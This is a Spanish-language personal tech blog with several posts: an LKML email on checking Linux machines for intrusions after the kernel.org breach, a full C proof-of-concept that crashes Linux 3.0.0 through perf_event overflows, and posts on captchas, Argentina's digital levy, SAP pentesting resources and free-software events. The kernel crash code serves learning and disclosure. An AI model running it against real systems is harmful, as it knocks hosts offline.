Vuelve Kernel.org (parcialmente)

Después del grave problema de seguridad vuelve Kernel.org, aunque con cosas parciales, estuve bajando el código del Kernel últimamente de github, pero no es muy cómodo que digamos

aca un mail de recomendación para los desarrolladores del núcleo de la lista de correo de LKML (es bueno también como recomendación para tener en cuenta para todos los días en la computadora de casa)

The compromise of kernel.org and related machines has made it clear that
some developers, at least, have had their systems penetrated.  As we
seek to secure our infrastructure, it is imperative that nobody falls
victim to the belief that it cannot happen to them.  We all need to
check our systems for intrusions.  Here are some helpful hints as
proposed by a number of developers on how to check to see if your Linux
machine might be infected with something:


0. One way to be sure that your system is not compromised is to simply
   do a clean install; we can all benefit from a new start sometimes.
   Before reinstalling any systems, though, consider following the steps
   below to learn if your system has been hit or not.

1. Install the chkrootkit package from your distro repository and see if it
   reports anything.  If your distro doesn't have the chkroot package,
   download it from:
	http://www.chkrootkit.org/

   Another tool is the ossec-rootcheck tool which can be found at:
	http://www.ossec.net/main/rootcheck

   And another one is the rkhunter program:
   	http://www.rootkit.nl/projects/rootkit_hunter.html
   [Note, this tool has the tendancy to give false-positives on some
   Debian boxes, please read /usr/share/doc/rkhunter/README.Debian.gz if
   you run this on a Debian machine]

2. Verify that your package signatures match what your package manager thinks
   they are.

   To do this on a rpm-based system, run the following command:
   	rpm --verify --all
   Please read the rpm man page for information on how to interpret the
   output of this command.

   To do this on a Debian based system, run the following bash snippet:
	dpkg -l \*|while read s n rest; do if [ "$s" == "ii" ]; then echo $n;
	fi; done > ~/tmp.txt
	for f in `cat ~/tmp.txt`; do debsums -s -a $f; done
   If you have a source-based system (Gentoo, LFS, etc.) you presumably
   know what you are doing already.

3. Verify that your packages are really signed with the distro's keys.

   Here's a bash snippet that can do this on a rpm based system to
   verify that the packages are signed with any key, not necessarily
   your distro's key.  That exercise is left for the reader:

	for package in `rpm -qa`; do
		sig=`rpm -q --qf '%{SIGPGP:pgpsig}\n' $package`
		if [ -z "$sig" ] ; then
			# check if there is a GPG key, not a PGP one
			sig=`rpm -q --qf '%{SIGGPG:pgpsig}\n' $package`
			if [ -z "$sig" ] ; then
				echo "$package does not have a signature!!!"
			fi
		fi
	done
   Unfortunately there is no known way of verifying this on Debian-based
   systems.

4. To replace a package that you find suspect, uninstall it and install
   it anew from your distro.  For example, if you want to reinstall the
   ssh daemon, you would do:
	$ /etc/init.d/sshd stop
	rpm -e openssh
	zypper install openssh	# for openSUSE based systems
	yum install openssh	# for Fedora based systems

   Ideally do this from a live cdrom boot, using the 'rpm --root' option
   to point rpm at the correct location.


5. From a liveCD environment, look for traces such as:
   a. Rogue startup scripts in /etc/rc*.d and equivalent directories.
   b. Strange directories in /usr/share that do not belong to a package.
      This can be checked on an rpm system with the following bash snippet:
	for file in `find /usr/share/`; do
		package=`rpm -qf -- ${file} | grep "is not owned"`
		if [ -n "$package" ] ; then
			echo "weird file ${file}, please check this out"
		fi
	done
6. Look for mysterious log messages, such as:
   a. Unexpected logins in wtmp and /var/log/secure*, quite possibly
      from legitimate users from unexpected hosts.
   b. Any program trying to touch /dev/mem.
   c. References to strange (non-text) ssh version strings in
      /var/log/secure*.  These do not necessarily indicate *successful*
      breakins, but they indicate *attempted* breakins which means your
      system or IP address has been targeted.

7. If any of the above steps show possible signs of compromise, you
   should investigate further and identify the actual cause.  If it
   becomes clear that the system has indeed been compromised, you should
   certainly reinstall the system from the beginning, and change your
   credentials on all machines that this machine would have had access
   to, or which you connected to through this machine.  You will need
   to check your other systems carefully, and you should almost
   certainly notify the administrators of other systems to which you
   have access.

Finally, please note that these hints are not guaranteed to turn up
signs of a compromised systems.  There are a lot of attackers out there;
some of them are rather more sophisticated than others.  You should
always be on the alert for any sort of unexpected behavior from the
systems you work with.


thanks,

Linux 3.0.0 crash oflo_sw_cpu_clock_crash

Mirando sitios como http://1337day.com/ y http://www.gossamer-threads.com/ encontre uno de tantos bugs para el kernel 3.0, pero aca hay un ejemplo de explotación de uno, esta bueno para aprender un poco mas de funcionamiento del Kernel. Ademas en gossamer-threads pueden encontrar varios mensajes de listas de correo muy interesantes

Básicamente tenemos un crash en el SO, lo que esta bueno es que al ser un código pequeño se puede analizar fácilmente

/* Error with overflows and perf::perf_count_sw_cpu_clock                    */
/* This test will crash Linux 3.0.0                                          */
/* compile with gcc -O2 -o oflo_sw_cpu_clock_crash oflo_sw_cpu_clock_crash.c */

/* by Vince Weaver <vweaver1 _at_ eecs.utk.edu>                              */

#define _GNU_SOURCE 1

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include <fcntl.h>

#include <linux/perf_event.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <asm/unistd.h>
#include <sys/ioctl.h>

#include <sys/mman.h>

#include <signal.h>

#include <sys/prctl.h>

#define MATRIX_SIZE 512
static double a[MATRIX_SIZE][MATRIX_SIZE];
static double b[MATRIX_SIZE][MATRIX_SIZE];
static double c[MATRIX_SIZE][MATRIX_SIZE];

static void naive_matrix_multiply(int quiet) {

  double s;
  int i,j,k;

  for(i=0;i<MATRIX_SIZE;i++) {
    for(j=0;j<MATRIX_SIZE;j++) {
      a[i][j]=(double)i*(double)j;
      b[i][j]=(double)i/(double)(j+5);
    }
  }

  for(j=0;j<MATRIX_SIZE;j++) {
     for(i=0;i<MATRIX_SIZE;i++) {
        s=0;
        for(k=0;k<MATRIX_SIZE;k++) {
	   s+=a[i][k]*b[k][j];
	}
        c[i][j] = s;
     }
  }

  s=0.0;
  for(i=0;i<MATRIX_SIZE;i++) {
    for(j=0;j<MATRIX_SIZE;j++) {
      s+=c[i][j];
    }
  }

  if (!quiet) printf("Matrix multiply sum: s=%lf\n",s);

  return;
}

static int total=0;

void our_handler(int signum,siginfo_t *oh, void *blah) {

  int fd=oh->si_fd;

  ioctl(fd , PERF_EVENT_IOC_DISABLE,0);
  total++;
  ioctl(fd , PERF_EVENT_IOC_REFRESH,1);
}

int perf_event_open(struct perf_event_attr *hw_event_uptr,
		    pid_t pid, int cpu, int group_fd, unsigned long flags) {

  return syscall(__NR_perf_event_open,hw_event_uptr,pid,cpu,group_fd,flags);

}

int main( int argc, char **argv ) {

	int fd;
	void *blargh;

	struct perf_event_attr pe;

	struct sigaction sa;

	memset(&sa, 0, sizeof(struct sigaction));
	sa.sa_sigaction=our_handler;
	sa.sa_flags=SA_SIGINFO;

	if (sigaction(SIGIO,&sa,NULL)<0) {
	  fprintf(stderr,"Error setting up signal handler\n");
	  exit(1);
	}

        memset(&pe,0,sizeof(struct perf_event_attr));	
	pe.type=PERF_TYPE_SOFTWARE;
	pe.size=sizeof(struct perf_event_attr);
        pe.config=PERF_COUNT_SW_CPU_CLOCK;
	pe.sample_period=100000;
	pe.sample_type=PERF_SAMPLE_IP;
	pe.read_format=PERF_FORMAT_GROUP|PERF_FORMAT_ID;
	pe.disabled=1;
	pe.pinned=1;
	pe.exclude_kernel=1;
	pe.exclude_hv=1;
	pe.wakeup_events=1;

	fd=perf_event_open(&pe,0,-1,-1,0);
	if (fd<0) {
	   printf("Error opening\n");
	}

	blargh=mmap(NULL,(1+2)*4096,PROT_READ|PROT_WRITE,MAP_SHARED,fd,0);
	fcntl(fd,F_SETFL,O_RDWR|O_NONBLOCK|O_ASYNC);
	fcntl(fd,F_SETSIG,SIGIO);
	fcntl(fd,F_SETOWN,getpid());

	ioctl(fd,PERF_EVENT_IOC_RESET,0);
	ioctl(fd,PERF_EVENT_IOC_ENABLE,0);

	naive_matrix_multiply(0);

	ioctl(fd,PERF_EVENT_IOC_DISABLE,0);
	munmap(blargh,(1+2)*4096);
	close(fd);

	printf("Total overflows: %d\n",total);

	return 0;
}

Referencias :
http://1337day.com/exploits/16813
http://www.gossamer-threads.com/lists/engine?do=post_attachment;postatt_id=43808;list=linux
http://www.securityhome.eu/exploits/

Capchas entretenidos

Viendo peculiares capchas tengo que comentar dos de ellos

uno el resistor capcha que tenes que indicar la capacidad de la resistencia en ohms http://wordpress.org/extend/plugins/resisty/

 

y tambien tenemos otro muy peculiar de escribir los dos animales http://gonzo.teoriza.com/animal-captcha

para hacer un poco mas realmente humano los capchas y algo entendible 🙂

Ley Argentina sobre Canon digital, o como meternos mas la mano en el bolsillo

Leyendo noticias de diferentes sitios me entere de una preocupante situación que podemos llegar a sufrir si se implementa esta distorsionada ley, cada ciudadano debe estar enterado de esto

De Rogerbits http://www.rogerbits.com/2011/06/28/el-canon-digital-hoy-en-el-senado-argentino/

El canon digital HOY en el Senado Argentino “la ley pirata”

Hace unos días me comentaban que el proyecto impulsado por los Senadores Pichetto @MiguelAPichetto y Rubén Giustiniani@rgiustiniani sobre el Canon digital en argentina (K- FPV) seguía activo y estaban intentando aprobarlo en este año..

Y hace unos minutos lo pude confirmar: En el día de hoy Martes 28 de junio a las 16:30 Hs (Agenda de la reunión) la comisión de legislación general del Senado Argentino va a tratar el proyecto expediente S3732/10 “Ley PIRATA argentina” Que no es mas que un impuesto que nos impone un cargo extra sobre la compra de cualquier producto electrónico o insumo, que pueda ser utilizado tangencialmente para copiar contenido protegido por leyes de propiedad intelectual. En resumidas cuentas, un nuevo impuestazo tecnológico, pero no solo eso.

.

El proyecto en cuestión será tratado por senadores que por ejemplo en la última reunión de esa comisión vertieron opiniones tales como: “Es un proyecto que “está bien hecho” y que busca finalizar con la violación de los derechos intelectuales, siendo miles y miles los pesos “que se le roban al autor de la obra” (Dichos textuales de la secretaria de la comisión)

.

El proyecto en cuestión que será tratado es éste.

.

Una vez más nos meten las manos en el bolsillo para proteger un esquema legal obsoleto de protección de los derechos intelectuales; La gravedad del tema que ya ya fracasado en España y busca ser impuesto en nuestro país en breve puede resumirse en estos párrafos:

.

El Art. 12: Indica de cuanto será el impuesto, el porcentaje es sobre el precio de venta:

.

b. (CDR/CDRW/DVR/DVDRW/Blu-ray): 75%

c. Tarjetas de memoria: 5%

d. Rígidos integrados o no en un equipo: 10%

e. Decos de señales de televisión por cable o satelital : 10%

f. Walkmans mp3 (Ipod x ej): 10%

g. Celulares con MP3: 1%

.

El valor de venta de precio al público se tomará de acuerdo con el valor de referencia de mercado, y en caso de no contarse con información fidedigna del mismo, a los fines de la aplicación de las tarifas establecidas en la presente ley, se realizará aplicando un cincuenta por ciento (50%) del valor de venta mayorista del producto o dispositivo. Osea, que si es un aparato que no se comercializa en el país, el impuesto sobre el precio pagado es de 50%!

.

Entonces en el supuesto caso que compres un equipo en el exterior y lo traigas antes que su lanzamiento en nuestro país tal vez tengas que pagar 50% de arancel aduanero y otro 50% para cumplir con la futura ley pirata Argentina.

.

Vamos a ver como sigue esto. Este port no intenta ser un analisis juridico del tema, solo ponerlo en conocimiento de todos, segurametne lo ire modificando con los dias, analizandolo al proyecto.

.

#NOLESVOTES.

Acá los nombres y mails de todos los senadores de la comisión que hoy tratará el tema.

.

Mas info sobre el canon: No Al CanonMarianoAlt1040 /

Buenos Aires, 1ro. de Julio de 2011

De Wikimedia Argentna http://www.wikimedia.org.ar/node/40

Wikimedia Argentina se opone al canon digital

El Senado de la Nación está debatiendo un proyecto para imponer un gravamen, denominado «derecho de remuneración», que afecta a dispositivos de almacenamiento y reproducción digital, con el declarado propósito de compensar las supuestas pérdidas causadas a productores, autores y otros derechohabientes de derechos de autor por los ciudadanos que copien, para su uso privado, materiales que hayan adquirido legítimamente. De aprobarse este proyecto, los montos resultantes serán administrados por sociedades gestoras de derechos de autor y conexos. Sin embargo, no existe ninguna evidencia empírica de que la copia privada ocasione pérdidas económicas a los titulares de los derechos de obras protegidas, por lo que el canon parecería constituir en realidad una fuente de ingresos nueva para gestoras colectivas y sus asociados, formada por un aporte compulsivo de la ciudadanía.

Wikimedia Argentina promueve proyectos basados en internet que se desarrollan de forma abierta y colaborativa, cuyos contenidos se encuentran amparados por licencias que promueven la copia y reutilización libres y gratuitas de los mismos. Gran parte de estos contenidos, por ejemplo, los de la conocida enciclopedia en línea Wikipedia, pueden distribuirse en discos compactos o memorias USB para su aprovechamiento con fines educativos en sitios o instituciones sin acceso a internet. El proyecto de canon digital encarecería en un 75% este tipo de proyectos, pese a que ni las gestoras colectivas ni sus asociados hayan hecho aporte alguno a los mismos.

Consideramos que un gravamen como el propuesto tiene evidentes efectos negativos respecto de la reducción de la brecha digital, el acceso a la tecnología y la información, y la igualdad de oportunidades, resultando por lo tanto abusivo y arbitrario. Por ello expresamos nuestro más enérgico repudio a la iniciativa, instamos a los legisladores a rechazar esta propuesta que lejos de resolver un problema inexistente, conducirá a crear problemas nuevos de mayor magnitud, y solicitamos al Honorable Senado que se nos permita ofrecer nuestra visión en la próxima reunión de Comisión de Legislación General en la que se trate este proyecto.

Al mismo tiempo, invitamos a grupos y organizaciones relacionados con la educación, la cultura, la libertad de expresión, los derechos civiles, los derechos de los consumidores, u otros, a adherirse a esta Declaración, a expresar sus objeciones mediante un documento propio o a reutilizar el presente documento en caso de que refleje cabalmente su propia opinión sobre este tema. En cualquiera de los casos, por favor, envíe un correo electrónico a correo (at) wikimedia.org.ar

Wikimedia Argentina

Ver tambien http://www.derechoaleer.org/2011/06/hoy-se-trata-en-el-senado-el-canon-digital.html

aca una muy buena infografia, clickear para agrandar

che y la música tradicional que no entra en los canones de las

reglas de la música heredadas de la europa, como sea una melodia realizada con

una trutruka, un sikus un kultrun tambien piensan apropiarla y cobrarnos impuestos por hacerles copias?

Auditoria y seguridad en SAP

No suelo repostear / retwittear post etc que veo en otros blogs a menos que me parescan interesantes y sean cosas que me ayudar a resolver mi trabajo / hobbie / lo que sea en mi vida ya sea software/fotografia/recetas de cocina/recomendacion para lavar la ropa, vi estos links en un twitteo de mis contactos y esta muy interesante

Metodología o Checklist para auditar un sistema SAP

Hablando con varios amigos, sobre el problema que uno de ellos tenia para auditar un sistema y al buscar para ayudarle con ese problema, nos dimos cuenta de la poca documentación existente para realizar un Pentesting de manera metódica en un sistema SAP, no encontramos fácilmente una guía o a seguir para auditar efectivamente estos sistemas.

Seguridad SAP Metodología o Checklist para auditar un sistema SAP

Aunque conocíamos buenas herramientas como Sapyto, un framework para auditoria de sistemas SAP del que ya habíamos hablado en la comunidad, y una excelente charla que dio Mariano Nuñez Di Croce, su creador, donde habla de pentesting a sistemas SAP, seguíamos sin encontrar una metodología a seguir, por eso decidimos preguntar en Twitter si alguien conocía alguna metodología para realizar un pentest en sistemas SAP y la respuesta fue tan buena que dio lugar a la creación de este post, donde pretendemos reunir en un solo lugar, los mejores recursos que puedas llegar a necesitar cuando realices una auditoria a sistemas SAP.

El primer recurso que les comparto es la charla de Mariano Niñez sobre Pentesting en Sistemas SAP:

En los aportes que nos realizaron se encuentra la Guía de Seguridad para sistemas SAP NetWeaver, pero también unas directrices para auditar SAP creado en el 2009 por Nishant Sourabh un empleado de IBM, que eran justo lo que necesitábamos:

Descarga las directrices para auditar SAP ECC de este enlace

Pero también documentación creada por la misma SAP con lineamientos para auditar SAP que nos ayudaran mucho en la tarea de auditar sistemas SAP.

Descarga los lineamientos para auditar SAP R/3 creados por SAP

En español encontramos un portal dedicado enteramente a la seguridad SAP llamado SeguridadSAP.com, el cual recomendamos totalmente desde La Comunidad DragonJAR, también agradecemos Space Cowboy (@EspeisCouboi) y Alberto Hil (@bertico413), por su colaboración.

Si tienes mas aportes en esta materia dejalos en los comentarios, para que juntos construyamos un buen listado de recursos para auditar sistemas SAP.

y tambien :

SAPYTO – Framework para realizar Penetration Tests sobre sistemas SAP

Sapyto  R/3 Pentest Tool es un  para realizar Penetration Tests sobre sistemas SAP. Permite que profesionales de seguridad lleven a cabo analisis de seguridad de diferentes componentes de implementaciones de SAP R/3.

Sapyto fue Presentado en Blackhat Europe 2007, fue liberado con varios modulos para analizar la seguridad de la implementacion de la interfaz RFC de los sistemas SAP. La arquitectura modular permite que los usuarios desarrollen sus propios modulos, extendiendo la funcionalidad y permitiendo que el Framework detected nuevas vulnerabilidades. Esta herramienta ha sido escrito en Python.

Descargar SAPYTO
Fuente del recurso: CRYPTEX

Tambien enlaces como

Proyecto Inguma

Proyecto Mantra

Aca el link de SAP http://help.sap.com/saphelp_nw04/helpdata/en/ed/18cc38e6df4741a264bddcd4f98ae2/frameset.htm

y los archivos de documentación oficial de SAP y seguridad los subi aca en cayu en la url

https://cayu.com.ar/files/sap/

SAPYTO http://www.cybsec.com/EN/research/sapyto.php

ah y recomendado bajarse los pdf de los slides de Mariano Nuñez en las diferentes ekopartys

POST Original : http://www.dragonjar.org/metodologia-o-checklist-para-auditar-un-sistema-sap.xhtml

ah y no nos olvidemos de usar los plugins de SAP CCMS para Nagios yo hasta ahora los vengo usando desde hace 4 años y tuve buenos resultados, y bueno tener bien armado el contexto de monitoreo y log centralizado

Barcamp Litoral 2011 un éxito

Barcamp es una red internacional de eventos abiertos, participativos y sin fines de lucro, enfocado en tecnologías emergentes, de código abierto (opensource) y protocolos sociales, en un marco de total innovación. El Barcamp Litoral estará organizado por la Universidad Nacional del Litoral, el Gobierno de la Ciudad de Santa Fe y Santa Fe Valley.

La desconferencia de tecnología más importante del mundo llega a Santa Fe

Así se anunciaba lo que iba a ser un tremendo evento

El sitio oficial : http://www.barcamplitoral.com.ar/

Llegamos a la mañana con todas las pilas

Nos acercamos al predio de la UNL, a minutos de la terminal

Con esto nos identificamos !! 😀

Di una charla de monitoreo de Redes y Loggueo centralizado

acá pueden encontrar documentación de referencia con ejemplos de código

http://wiki.cayu.com.ar/doku.php?id=manuales:nagios

Y también di una charla sobre Pueblos Originarios y Software Libre

el puente de Santa Fe

Acá el puente, le deje 15 seg de obturación, deberia haberle dejado 10 seg pero igual salió tengo que ver como quedó el RAW

el evento fue un éxito y el día se presto para todo, con mas de 1800 asistentes queda para el recuerdo

Festival Latinoamericano de Instalacion de SOftware Libre 2011 – Lanús

Festival Latinoamericano de Instalacion de SOftware Libre

El FLISOL (Festival Latinoamericano de Instalación de Software Libre) es el evento de difusión de Software Libre más grande en Latinoamérica. Se realiza desde el año 2005 y su principal objetivo es promover el uso del software libre, dando a conocer al público en general su filosofía, alcances, avances y desarrollo.

Para tal fin, las diversas comunidades locales de software libre (en cada país, en cada ciudad/localidad), organizan simultáneamente eventos en los que se instala de manera gratuita y totalmente legal, software libre en las computadoras que llevan los asistentes. Además, en forma paralela, se ofrecen charlas, ponencias y talleres, sobre temáticas locales, nacionales y latinoamericanas en torno al Software Libre, en toda su gama de expresiones: artística, académica, empresarial y social.

Como todos los años Lanux participará del Festival latinoamericano de instalación de Software Libre (FLISOL)!!

Traes tu computadora y te ayudamos a instalar Software Libre gratuitamente !!

El evento se realizará el sábado 9 de abril en la Universidad Kennedy (sede Lanús – Av. Hipólito Yrigoyen 4651 a 50 mtrs de la estación ).

Para más información sobre el evento hace click aca

Para inscribirte a Flisol 2011, hace click aca

aca el evento en Facebook http://www.facebook.com/event.php?eid=196650930365280

mas info en http://www.lanux.org.ar

Clickea en el banner de abajo para imprimirlo y pegarlo en tu escuela/universidad